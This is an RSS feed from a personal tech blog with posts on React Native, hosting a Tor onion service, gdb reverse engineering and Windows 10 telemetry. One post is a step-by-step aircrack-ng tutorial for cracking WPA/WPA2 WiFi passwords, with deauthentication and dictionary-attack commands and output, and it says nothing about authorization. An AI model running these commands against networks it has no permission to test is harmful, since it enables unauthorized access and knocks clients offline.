{ WLog } / My blog site Sun, 02 Aug 2020 14:15:07 GMT http://blogs.law.harvard.edu/tech/rss https://github.com/jpmonette/feed <![CDATA[Transitioning from React to React Native]]> /posts/2019-06-07/react-vs-react-native /posts/2019-06-07/react-vs-react-native

How do you go from React to React Native?

You already use React to build web apps. You’ve heard about this thing called React Native and want to play with it… or even build a client project with it.

And you probably have many questions, one of which is:

“Would I get lost if I don’t already know how to build apps with Swift/Java?”

It depends on the app, but the quick answer is No, you won’t get lost. For the most part, things will work just like in React. You have some div-like components, which you can style with something like CSS. You have the same state and props mechanisms.

When might you need to know some Swift/Java?

If you plan on writing a full-featured mobile game, React Native will probably be out of consideration. If you need to write some native code, whether to optimize performance, or access native mobile APIs, knowing Swift, Objective-C, or Java will come in handy. Mostly, however, you are not going to need any knowledge of any native language.

But mobile apps often need to make use of some native APIs… do I have to learn Swift if I need Touch ID support? Even when you do have to make use of some native functionality, chances are, there’s a React Native wrapper for that already!

React Native comes bundled with some native wrappers:

And there are npm packages for things like Touch ID and many more.

Which sometimes can require some fiddling around in Xcode or editing Gradle files (no worries if you have no idea what these are), but their readmes usually give clear step by step guidance on what to do.

In most cases, running react-native link <package-name> will do that for you, automatically!

What about distribution?

While the first-hand experience of Xcode, iTunes Connect and things in-between would be beneficial, you can follow the steps to submit your app even without knowing any Swift or Java.

While we’re at it…

React vs. React Native

Here is a quick run-down of differences between React and React Native:

  • Most of React knowledge is transferrable to React Native.

    State, props, everything works the same way as you’d expect it to.

  • <View> instead of <div>.

    different component for text input.

  • Many of CSS properties are supported by React Native.

    You have flexbox and absolute positioning and colors and borders and so on.

    You don’t get CSS transitions, though. But React Native does come with a very powerful API for animations.

    Also —- no media queries.

  • There are no class names, however. You have to pass in the styles directly to the components: <View style={{ margin: 10 }}>.

  • fetch works as you’d expect it to.

  • AsyncStorage in place of localStorage.

  • Android support can be quirky. overflow: visible is not supported, and until recently, there were zIndex issues.

]]> <![CDATA[How to deploy a server on the dark web]]> /posts/2019-06-14/host-server-dark-web /posts/2019-06-14/host-server-dark-web

The Tor browser can be downloaded from here. Once installed, you can open the browser, and it will automatically connect to the Tor network. You can view your route through the Tor network by clicking the drop-down arrow next to the onion icon in the upper left part of the window.

Tor has been protecting people’s identity from being uncovered and allowed them to express their ideas over the internet anonymously. A significant number of people misuse this network to visit banned websites, download sexual content by bypassing filters and most importantly, tor is used by hackers to attack organizations without revealing their identity. An example for the latter was the Skynet Botnet in which the Command and Control servers (C∧C) were hidden behind the Tor network.

How Does TOR Work ?

Tor consists of a network of relay servers which are run by volunteers all over the world. When a user connects to the Tor network using Tor client/Tor enabled browser, a path is created from the user to the destination server to which the user needs to connect. This path consists of three relay servers called Entry Node, Middle Node and Exit Node. All the requests the sender sends to the destination through the Tor network are relayed through this pre-built path and the responses from the destination returns back to the sender through the same path. All the data going through the Tor network is completely encrypted such that nobody who intercepts the communication have no clue who the sender is. But, if one sniffs outgoing link from the exit node can capture the data transmitted both sides, but anonymity is still secured When you download Tor from the website, you can run Tor as a local SOCKS proxy in you computer. When your browser is configured to use that local SOCKS proxy, you can browser internet with that browser through the tor network. You can configure many applications to use this SOCKS proxy and use them through Tor network, these applications include web browsers, download manager software, bittorrent clients etc.

However, this blog post focuses more how to deploy a server using the onion routing protocal over tor and not an introduction to how Tor works. You can find the exact specifics of how tor works here. Moving on.

Section 1 - Running a simple python server

The first step in configuring a Tor server will be setting up a way to serve HTTP content, just the same as a regular web server might. While we might choose to run a conventional web server at 0.0.0.0 so that it becomes accessible to the internet as a whole by its IP, we can bind our local server environment to 127.0.0.1 to ensure that it will be accessible only locally and through Tor. On a system where we can call a Python module directly, we might choose to use the http.server module. After changing directories to one which contains content we would like to host, we can run a server directly from the command line. Using Python 3 and http.server, we can use the following string to bind to 127.0.0.1 and launch a server on port 8080. Just be sure that it’s bound to 127.0.0.1 to prevent discovery through services such as Shodan.

$ python3 -m http.server --bind 127.0.0.1 8080

In order to make testing the server easier, it may be useful to create an “index.html” file in the directory from which the server is being run. Something as simple as the file below will work.

<html>
<body>
W.L
</body>
</html>

To ensure that our server is functional, we’ll want to test our local address 127.0.0.1 or localhost in a web browser by opening it as an address followed by a port number, as seen below:

http://localhost:8080

With our local server environment configured and available at 127.0.0.1:8080, we can now start to link our server to the Tor network.

Section 2 - Configuring the tor service

First, you confirm that the Tor service is installed. The Tor service is separate from the Tor Browser and for Linux, it is available here. On Ubuntu or Debian-based distros with apt package manager, the following command should work assuming Tor is in the distro’s repositories.

$ sudo apt-get install tor

To confirm the location of our Tor installation and configuration, we can use whereis.

$ whereis tor

This will show us a few of the directories which Tor uses for configuration. We’re looking for our “torrc” file, which is most likely in /etc/tor. In order to direct Tor to our service, we’ll want to un-comment the following two lines in the torcc file. To do this, we simply remove the “#” symbols at the beginning of those two lines.

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:80

Next, we’ll want to correct the port on which Tor looks for our server. If we’re using port 8080, we’ll want to correct the line from port 80 to port 8080. We will change the original seen below to the correct port number. We will change this to port 8080

HiddenServicePort 80 127.0.0.1:8080

Save and exit. If there’s any permission problems just run it with sudo.

Section 3 - Testing

Once we confirm that the necessary changes have been made to the torcc file and the python’s http server is running at localhost:8080, we can simply run the following command to start the tor service.

$ sudo tor

Upon starting Tor for the first time with our new configuration, an .onion address will be generated automatically. This information will be stored in /var/lib/tor/hidden_service We then cd to that directory

$ cd /var/lib/tor/hidden_service

After running ls to ensure that both the hostname and private_key files are in the directory, we can view our newly generated address.

$ cat hostname

The string ending in .onion is our the service address. While this one was automatically generated, we can customize it if necessary. We can test that our service is accessible by opening it in Tor Browser. If the address resolves to your server, you’ve successfully hosted a tor server!

Section 4 - Extra (Optional)

In order to customize our onion address, we’ll need to generate a new private key to match a custom hostname. Due to the nature of Tor addresses being partially hashes, in order to create a custom address, we’ll need to brute-force the address we want. The more consecutive characters of a word or phrase we’d like to use, the longer it will take to generate.

There are a few open source tools available for this, Eschalot and Scallion being some of the more popular ones. Scallion uses the GPU to generate addresses, while Eschalot works using wordlists. That’s about it. You can deploy any time of HTTP server using this, there’s no requirement to stick with python’s HTTP server. You could run run the same HTTP server using Node.Js which is actually what I would personally prefer.

$ npm i -g http-server
$ http-server
]]> <![CDATA[Reverse engineering binaries using gdb]]> /posts/2019-06-21/gdb-reverse-engineering /posts/2019-06-21/gdb-reverse-engineering

General note on compiling for debugging:

Normally, to enable the debugger to use the source code, you would compile a program using the -g flag:

$ gcc -g program.c -o program (for lowest level of optimization), or

$ gcc -g -O2 program.c -o program (for optimization level 2)

The -g -O2 combination is valid and enables one to to debug the optimized executable. However the compiler will have generated a lot of optimizations, which will make it more difficult to step through the code. Using -g with no optimizations works best for debugging with source code.

Examining the executable file

The symbol table is sometimes useful to identify calls to standard library functions, (e.g., printf), as well as the bomb’s own functions. Note that the symbol table is always present in the executable, even if the executable was compiled without the -g switch. 

You can look at all the bomb’s symbol table by using nm:

$ nm bomb

Examine the symbols marked with a T (capital t), and ignore the ones that start with an _ (underscore). These are names of functions from the C program that was used to compile the bomb. 

Next, take a look at the printable strings from the file:

$ strings program 

This can often provide clues that will help you understand the program. Then, use objdump to disassemble the bomb:

$ objdump -d program | less

GDB (GNU DeBugger) 

gdb is a debugger commonly used when programming, but it is also useful for reverse engineering binary code. It lets you step through the assembly code as it runs, and examine the contents of registers and memory. You can also set breakpoints at arbitrary positions in the program. Breakpoints are points in the code where program execution is instructed to stop. This way, you can let the debugger run without interruption over large portions of code, such as code that we already understand or believe is error-free.

Starting gdb

Start gdb by specifying what executable to debug:

$ gdb program 

You can run the program in the debugger just as you would outside the debugger, except that you can instruct the program to stop at certain locations and inspect current values of memory and registers. As a last resort, you can use (Ctrl-C) to stop the program and panic out. But this is not recommended and is usually not necessary, as long as you positioned our breakpoints appropriately.

To start a program inside gdb:

$ (gdb) run

To start a program inside gdb, with certain input parameters:
$ (gdb) run parameters

Examples:
$ (gdb) run < ./solution.txt
(equivalent to ./program < solution.txt, but inside gdb)

$ (gdb) run -d 1
(equivalent to ./program -d 1)

To exit gdb and return to the shell prompt:
$ (gdb) quit

Note that exiting gdb means you lose all of your breakpoints that you set in this gdb session. When you re-run gdb, you need to respecify any breakpoints that you want to re-use.

Breakpoints

We wouldn’t be using gdb if all we did was run the program without any interruptions. We need to stop program execution at certain key positions in the code, and then examine program behavior around those positions. How do we pick a good location for a breakpoint?

First, you can always set a breakpoint at 'main’, since every C program has a function called main.

$ (gdb) break main

You can also set breakpoints at the other functions you identified with nm.

To set a breakpoint at the machine instruction located at the address 0x401A23:

(gdb) break *0x401A23

Note: don’t forget the '0x’. If you forget it, and if you are unlucky enough that the address doesn’t contain any A,B,C,D,E,F characters, breakpoint address will be interpreted as if given in the decimal notation. This results in a completely different address to what was desired, and breakpoint won’t work as expected.

To see what breakpoints are currently set:
$ (gdb) info break

To delete one or more breakpoints:
$ (gdb) delete <breakpoint number>

Example:
$ (gdb) delete 4 7
erases breakpoints 4 and 7. 

Terminating program execution from within gdb

We can terminate the program at any time:

$ (gdb) kill

Note that this doesn’t exit gdb, and all your breakpoints remain active. You can re-run the program using the run command, and all breakpoints still apply.

Stepping through the code

To execute a single machine instruction, use

$ (gdb) stepi

Note that if you use stepi on a callq instruction, debugger will proceed inside the called function.\ Also note that pressing

re-executes the last gdb command. To execute several stepi instructions one after another, type stepi once, and then press
several times in a row. 

Sometimes we want to execute a single machine instruction, but if that instruction is a call to a function, we want the debugger to execute the function without our intervention. This is achieved using 'nexti’:\

$ (gdb) nexti

Program will be stopped as soon as control returns from the function, i.e. at the instruction immediately after callq in the caller function. 

If you accidentally use stepi to enter a function call, and you really don’t want to debug that function, you can use “finish” to resume execution until the current function returns. Execution will stop at the machine instruction immediately after the “callq” instruction in the caller function, just as if we had called “nexti” in the first place:

$ (gdb) finish

Note: make sure the current function can really be run safely without your intervention. You don’t want it to call explode_bomb. 

To instruct the program to execute (without your intervention) until the next breakpoint is hit, use:

$ (gdb) continue

The same warning as in the case of “finish” applies. 

If program contains debugging information (i.e., it was compiled with the -g switch to gcc), you can also step a single C statement:

$ (gdb) step

Or, if next instruction is a function call, you can use “next” to execute the function without our intervention. This is just like nexti, except that it operates with C code as opposed to machine instructions:

$ (gdb) next

Disassembling code using gdb

You can use disassemble to disassemble a function or a specified address range. 

To disassemble function some_function:

$ (gdb) disassemble some_function

To disassemble the address range from 0x4005dc to 0x4005eb:

$ (gdb) disassemble 0x4005dc 0x4005eb

Examining registers

To inspect the current values of registers:

(gdb) info registers

This prints out the current values of all registers.

To inspect the current values of a specific register (assuming 32-bit registers):

$ (gdb) p $eax

To print the value in hex notation:
$ (gdb) p/x $eax

Note: if you are debugging a 64-bit program, replace the EXX regirsters with RXX (e.g. use $rax instead of $eax). Using “p $eax” to print just the lower 32 bits of the register doesn’t work (at least with some versions of gdb). You have to print a full 64-bit register.

To see the address of the next machine instruction to be exectued:
$ (gdb) frame
or, equivalently, you can inspect the instruction pointer register:
$ (gdb) p/x $eip

You can also inspect the value of a variable:
$ (gdb) p buffer

or its address:
$ (gdb) p &buffer

When debugging a C/C++ program for which the source code is available, you can also inspect the call-stack (a list of all nested function calls that led to the current function being executed):\

$ (gdb) where

Examining memory

To inspect the value of memory at location 0x400746:

$ (gdb) x/NFU 0x400746

Here:

  • N = number of units to display
  • F = output format (hex=h, signed decimal=d, unsigned decimal=u, string=s, char=c)
  • U = defines what constitutes a unit: b=1 byte, h=2 bytes, w=4 bytes, g=8 bytes

Note that output format and unit definition characters are mutually distinct from each other.

Examples:

To use hex notation, and print two consecutive 64-bit words, starting from the address 0x400746 and higher:
$ (gdb) x/2xg 0x400746

To print a null-terminated string at location 0x400746:
$ (gdb) x/s 0x400746

To use hex notation, and print five consecutive 32-bit words, starting from the address 0x400746:
$ (gdb) x/5xw 0x400746

To print a single 32-bit word, in decimal notation, at the address 0x400746:
$ (gdb) x/1dw 0x400746

Examining core files

If your program segfaults, it is sometimes useful to examine the core dump (for example, memory addresses may be different when running a program in gdb and when executing it separately). To do this, you first have to configure your operating system to dump core:

$ uname -c unlimited

When a program receives a segmentation fault (SEGFAULT) signal, you will find a corefile (typically called core or core.PID, where PID is the ID of the process that crashed) in the current directory. Load it in gdb as follows:

$ (gdb) core corefile

You can then use all the gdb commands described above to examine the state of the stack, variables, memory, etc. when the process crashed.

GDB references

]]> <![CDATA[Hacking wireless access points]]> /posts/2019-06-27/aircrack-ng /posts/2019-06-27/aircrack-ng

If you want to know how to hack WiFi access points — just read this step by step aircrack-ng tutorial, run the verified commands and crack passwords easily.

With the help a these commands you will be able to hack WiFi AP (access points) that use WPA/WPA2-PSK (pre-shared key) encryption.

The basis of this method of hacking WiFi lies in capturing of the WPA/WPA2 authentication handshake and then cracking the PSK using 'aircrack-ng’.

Section 1, Aircrack-ng: Download and Install

How to hack Wireless Access Points — the action plan:

  1. Download and install the latest aircrack-ng
  2. Start the wireless interface in monitor mode using the airmon-ng
  3. Start the airodump-ng on AP channel with filter for BSSID to collect authentication handshake
  4. [Optional] Use the aireplay-ng to deauthenticate the wireless client
  5. Run the aircrack-ng to hack the WiFi password by cracking the authentication handshake

Install the required dependencies:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Download and install the latest aircrack-ng (current version):

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz  -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install

Ensure that you have installed the latest version of aircrack-ng:

$ aircrack-ng --help

  Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

Section 2, Airmon-ng: Monitor Mode

Now it is required to start the wireless interface in monitor mode. Monitor mode allows a computer with a wireless network interface to monitor all traffic received from the wireless network. What is especially important for us — monitor mode allows packets to be captured without having to associate with an access point. Find and stop all the processes that use the wireless interface and may cause troubles:

$ sudo airmon-ng check kill

Start the wireless interface in monitor mode:

$ sudo airmon-ng start wlan0
Interface   Chipset     Driver

wlan0       Intel 6235  iwlwifi - [phy0]
                (monitor mode enabled on mon0)

In the example above the airmon-ng has created a new wireless interface called mon0 and enabled on it monitor mode. So the correct interface name to use in the next parts of this tutorial is the mon0.

Section 3, Airodump-ng: Authentication Handshake

Now, when our wireless adapter is in monitor mode, we have a capability to see all the wireless traffic that passes by in the air. This can be done with the airodump-ng command:

$ sudo airodump-ng mon0

All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe
66:77:88:99:00:11  -64      134     345   34   1  54e  WPA2 CCMP   PSK  SomeAP

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78    0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78    2 - 32      0       1

Start the airodump-ng on AP channel with the filter for BSSID to collect the authentication handshake for the access point we are interested in:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
OptionDescription
-cThe channel for the wireless network
--bssidThe MAC address of the access point
-wThe file name prefix for the file which will contain authentication handshake
mon0The wireless interface
--ignore-negative-oneFixes the “fixed channel : -1” error message

Now wait until airodump-ng captures a handshake. If you want to speed up this process — go to the step #4 in section 1 and try to force wireless client reauthentication. After some time you should see the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen. This means that the airodump-ng has successfully captured the handshake:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

Section 4, Aireplay-ng: Deauthenticate Client

If you can’t wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we’ll capture the authentication handshake.

Send deauth to broadcast:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Send directed deauth (attack is more effective when it is targeted):

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
OptionDescription
--deauth 100The number of de-authenticate frames you want to send (0 for unlimited)
-aThe MAC address of the access point
-cThe MAC address of the client
mon0The wireless interface
--ignore-negative-oneFixes the “fixed channel : -1” error message

Section 5, Aircrack-ng: Hack WiFi Password

Unfortunately there is no way except brute force to break WPA/WPA2-PSK encryption. To hack WiFi password, you need a password dictionary. And remember that this type of attack is only as good as your password dictionary. You can download some dictionaries from here.

Crack the WPA/WPA2-PSK with the following command:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
OptionDescription
-wThe name of the dictionary file
-bThe MAC address of the access point
WPAcrack.capThe name of the file that contains the authentication handshake
                     Aircrack-ng 1.2 beta3 r2393

               [00:08:11] 548872 keys tested (1425.24 k/s)

                       KEY FOUND! [ 987654321 ]

  Master Key    : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
                   CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5

  Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
                   AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
                   DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
                   A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3

  EAPOL HMAC    : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
]]> <![CDATA[What data is collected from your Windows 10 machine and where its going]]> /posts/2019-06-29/windows-10-telemetry /posts/2019-06-29/windows-10-telemetry

Windows 10 includes a piece of software called the Connected User Experience and Telemetry component, also known as the Universal Telemetry Client (UTC). It runs as a Windows service with the display name DiagTrack and the actual service name utcsvc. Microsoft has engineered this component as a part of Windows. You can see the DiagTrack service in the Services console in Windows 10. It’s not a secret.

To find the process ID (PID) for the service, look on the Services tab in Windows Task Manager. This piece of information is useful for anyone who wants to monitor activities of the DiagTrack service using other software tools. I used that PID to watch the activity of the DiagTrack service.

What data is collected from a Windows 10 machine?

Telemetry data includes information about the device and how it’s configured (including hardware attributes such as CPU, installed memory, and storage), as well as quality-related information such as uptime and sleep details and the number of crashes or hangs. Additional basic information includes a list of installed apps and drivers. For systems where the telemetry is set to a level higher than Basic, the information collected includes events that analyze interaction between the user and the operating system and apps.

Where is the telemetry data stored?

On a Windows 10 machine, telemetry data is stored in encrypted files in the hidden %ProgramData%\Microsoft\Diagnosis folder. The files and folders in this location are not accessible to normal users and have permissions that make it difficult to snoop in them. Even if you could look into the contents of those files, there’s nothing to see, because the data files are encrypted locally.

Where is all the data going?

Moment of truth. You can find the DNS hostnames below. Unfortunately hostnames like these aren’t super helpful. Different people can look up the hostnames to different IP addresses, depending on their location. Routers need IP ranges to block, not hostnames.

If you want to minimize telemetry, you can disable the DiagTrack service and put the above hostnames in your hosts file. That should block outgoing traffic. You can use Wireshark or any other packet monitoriong tool such as this to check it out yourself.

]]>